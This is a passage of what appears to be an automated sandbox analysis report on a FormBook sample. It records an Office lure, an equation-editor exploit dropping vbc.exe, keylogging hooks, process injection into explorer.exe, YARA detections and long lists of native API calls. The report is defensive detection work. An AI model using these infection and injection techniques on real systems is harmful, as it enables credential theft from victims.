Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, vbc.exe, 00000005.00000002.2171190369.0000000000F92000.00000020.00020000.sdmp	String found in binary or memory: https://api.coinmarketcap.com/v1/ticker/
Source: vbc.exe, vbc.exe, 00000005.00000002.2171190369.0000000000F92000.00000020.00020000.sdmp	String found in binary or memory: https://coinmarketcap.com/api/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: vbc[1].exe.2.dr, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: vbc.exe.2.dr, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 4.0.vbc.exe.f90000.0.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 4.2.vbc.exe.f90000.3.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 5.0.vbc.exe.f90000.0.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook
Source: 5.2.vbc.exe.f90000.3.unpack, Utilities/GlobalKeyboardHook.cs	.Net Code: Hook

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: document is protected 17 18 19 20 21 22 Open the document m If this document was 23 Microsoft
Source: Screenshot number: 4	Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 0 0 0 0 0 q 32 " 33 0 0 0 0 0

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181B0 NtCreateFile,	5_2_004181B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418260 NtReadFile,	5_2_00418260
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182E0 NtClose,	5_2_004182E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418390 NtAllocateVirtualMemory,	5_2_00418390
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041816A NtCreateFile,	5_2_0041816A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004181AB NtCreateFile,	5_2_004181AB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182DF NtClose,	5_2_004182DF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004182AA NtClose,	5_2_004182AA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041838A NtAllocateVirtualMemory,	5_2_0041838A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A000C4 NtCreateFile,LdrInitializeThunk,	5_2_00A000C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A00078 NtResumeThread,LdrInitializeThunk,	5_2_00A00078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00A00048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A007AC NtCreateMutant,LdrInitializeThunk,	5_2_00A007AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FF9F0 NtClose,LdrInitializeThunk,	5_2_009FF9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FF900 NtReadFile,LdrInitializeThunk,	5_2_009FF900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_009FFAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_009FFAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_009FFBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_009FFB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_009FFC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_009FFC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFD8C NtDelayExecution,LdrInitializeThunk,	5_2_009FFD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_009FFDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_009FFEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_009FFED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFFB4 NtCreateSection,LdrInitializeThunk,	5_2_009FFFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A010D0 NtOpenProcessToken,	5_2_00A010D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A00060 NtQuerySection,	5_2_00A00060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A001D4 NtSetValueKey,	5_2_00A001D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0010C NtOpenDirectoryObject,	5_2_00A0010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A01148 NtOpenThread,	5_2_00A01148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FF8CC NtWaitForSingleObject,	5_2_009FF8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A01930 NtSetContextThread,	5_2_00A01930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FF938 NtWriteFile,	5_2_009FF938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFAB8 NtQueryValueKey,	5_2_009FFAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFA20 NtQueryInformationFile,	5_2_009FFA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFA50 NtEnumerateValueKey,	5_2_009FFA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFBE8 NtQueryVirtualMemory,	5_2_009FFBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFB50 NtCreateKey,	5_2_009FFB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFC30 NtOpenProcess,	5_2_009FFC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFC48 NtSetInformationFile,	5_2_009FFC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A00C40 NtGetContextThread,	5_2_00A00C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A01D80 NtSuspendThread,	5_2_00A01D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFD5C NtEnumerateKey,	5_2_009FFD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFE24 NtWriteVirtualMemory,	5_2_009FFE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFFFC NtCreateProcessEx,	5_2_009FFFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009FFF34 NtQueueApcThread,	5_2_009FFF34
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001067C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	5_2_001067C7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001067C2 NtQueryInformationProcess,	5_2_001067C2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E00C4 NtCreateFile,LdrInitializeThunk,	7_2_028E00C4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E07AC NtCreateMutant,LdrInitializeThunk,	7_2_028E07AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_028DFAB8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_028DFAD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_028DFAE8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_028DFBB8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFB50 NtCreateKey,LdrInitializeThunk,	7_2_028DFB50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_028DFB68
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DF9F0 NtClose,LdrInitializeThunk,	7_2_028DF9F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DF900 NtReadFile,LdrInitializeThunk,	7_2_028DF900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_028DFED0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFFB4 NtCreateSection,LdrInitializeThunk,	7_2_028DFFB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_028DFC60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFD8C NtDelayExecution,LdrInitializeThunk,	7_2_028DFD8C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_028DFDC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E10D0 NtOpenProcessToken,	7_2_028E10D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E0048 NtProtectVirtualMemory,	7_2_028E0048
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E0060 NtQuerySection,	7_2_028E0060
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E0078 NtResumeThread,	7_2_028E0078
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E01D4 NtSetValueKey,	7_2_028E01D4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E010C NtOpenDirectoryObject,	7_2_028E010C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E1148 NtOpenThread,	7_2_028E1148
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFA20 NtQueryInformationFile,	7_2_028DFA20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFA50 NtEnumerateValueKey,	7_2_028DFA50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFBE8 NtQueryVirtualMemory,	7_2_028DFBE8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DF8CC NtWaitForSingleObject,	7_2_028DF8CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DF938 NtWriteFile,	7_2_028DF938
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E1930 NtSetContextThread,	7_2_028E1930
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFEA0 NtReadVirtualMemory,	7_2_028DFEA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFE24 NtWriteVirtualMemory,	7_2_028DFE24
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFFFC NtCreateProcessEx,	7_2_028DFFFC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFF34 NtQueueApcThread,	7_2_028DFF34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFC90 NtUnmapViewOfSection,	7_2_028DFC90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFC30 NtOpenProcess,	7_2_028DFC30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFC48 NtSetInformationFile,	7_2_028DFC48
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E0C40 NtGetContextThread,	7_2_028E0C40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028E1D80 NtSuspendThread,	7_2_028E1D80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028DFD5C NtEnumerateKey,	7_2_028DFD5C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000981B0 NtCreateFile,	7_2_000981B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00098260 NtReadFile,	7_2_00098260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000982E0 NtClose,	7_2_000982E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00098390 NtAllocateVirtualMemory,	7_2_00098390
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009816A NtCreateFile,	7_2_0009816A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000981AB NtCreateFile,	7_2_000981AB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000982AA NtClose,	7_2_000982AA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000982DF NtClose,	7_2_000982DF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009838A NtAllocateVirtualMemory,	7_2_0009838A

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00210560	4_2_00210560
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002121D0	4_2_002121D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021366A	4_2_0021366A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002163C4	4_2_002163C4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D410	4_2_0021D410
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00210D0A	4_2_00210D0A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00214DE8	4_2_00214DE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021AB7D	4_2_0021AB7D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B94C	5_2_0041B94C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C277	5_2_0041C277
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C4B	5_2_00408C4B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C50	5_2_00408C50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BCB1	5_2_0041BCB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C573	5_2_0041C573
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CDEF	5_2_0041CDEF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B71F	5_2_0041B71F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BF28	5_2_0041BF28
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0E0C6	5_2_00A0E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3D005	5_2_00A3D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A8D06D	5_2_00A8D06D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A13040	5_2_00A13040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A2905A	5_2_00A2905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0E2E9	5_2_00A0E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AB1238	5_2_00AB1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AB63BF	5_2_00AB63BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0F3CF	5_2_00A0F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A363DB	5_2_00A363DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A12305	5_2_00A12305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A5A37B	5_2_00A5A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A17353	5_2_00A17353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A45485	5_2_00A45485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A21489	5_2_00A21489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A9443E	5_2_00A9443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A4D47D	5_2_00A4D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A905E3	5_2_00A905E3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A2C5F0	5_2_00A2C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1351F	5_2_00A1351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A56540	5_2_00A56540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A14680	5_2_00A14680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1E6C1	5_2_00A1E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AB2622	5_2_00AB2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A5A634	5_2_00A5A634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1C7BC	5_2_00A1C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A9579A	5_2_00A9579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A457C3	5_2_00A457C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AAF8EE	5_2_00AAF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A8F8C4	5_2_00A8F8C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3286D	5_2_00A3286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1C85C	5_2_00A1C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A129B2	5_2_00A129B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AB098E	5_2_00AB098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A269FE	5_2_00A269FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A9394B	5_2_00A9394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A95955	5_2_00A95955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AC3A83	5_2_00AC3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00ABCBA4	5_2_00ABCBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A96BCB	5_2_00A96BCB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A9DBDA	5_2_00A9DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0FBD7	5_2_00A0FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A37B00	5_2_00A37B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AAFDDD	5_2_00AAFDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A40D3B	5_2_00A40D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A1CD5B	5_2_00A1CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A42E2F	5_2_00A42E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A2EE4C	5_2_00A2EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00AACFB1	5_2_00AACFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A82FDC	5_2_00A82FDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A20F3F	5_2_00A20F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A3DF7C	5_2_00A3DF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001067C7	5_2_001067C7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00105062	5_2_00105062
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001008F9	5_2_001008F9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00100902	5_2_00100902
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001032FF	5_2_001032FF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00103302	5_2_00103302
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00101362	5_2_00101362
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001075B2	5_2_001075B2
Source: C:\Windows\explorer.exe	Code function: 6_2_0296D2FF	6_2_0296D2FF
Source: C:\Windows\explorer.exe	Code function: 6_2_0296A8F9	6_2_0296A8F9
Source: C:\Windows\explorer.exe	Code function: 6_2_0296F062	6_2_0296F062
Source: C:\Windows\explorer.exe	Code function: 6_2_029715B2	6_2_029715B2
Source: C:\Windows\explorer.exe	Code function: 6_2_029707C7	6_2_029707C7
Source: C:\Windows\explorer.exe	Code function: 6_2_0296A902	6_2_0296A902
Source: C:\Windows\explorer.exe	Code function: 6_2_0296D302	6_2_0296D302
Source: C:\Windows\explorer.exe	Code function: 6_2_0296B362	6_2_0296B362
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028EE2E9	7_2_028EE2E9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02991238	7_2_02991238
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_029963BF	7_2_029963BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028EF3CF	7_2_028EF3CF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_029163DB	7_2_029163DB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F2305	7_2_028F2305
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F7353	7_2_028F7353
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0293A37B	7_2_0293A37B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028EE0C6	7_2_028EE0C6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0291D005	7_2_0291D005
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0290905A	7_2_0290905A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F3040	7_2_028F3040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0296D06D	7_2_0296D06D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F4680	7_2_028F4680
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028FE6C1	7_2_028FE6C1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0293A634	7_2_0293A634
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02992622	7_2_02992622
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0297579A	7_2_0297579A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028FC7BC	7_2_028FC7BC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_029257C3	7_2_029257C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02925485	7_2_02925485
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02901489	7_2_02901489
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0297443E	7_2_0297443E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0292D47D	7_2_0292D47D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0290C5F0	7_2_0290C5F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F351F	7_2_028F351F
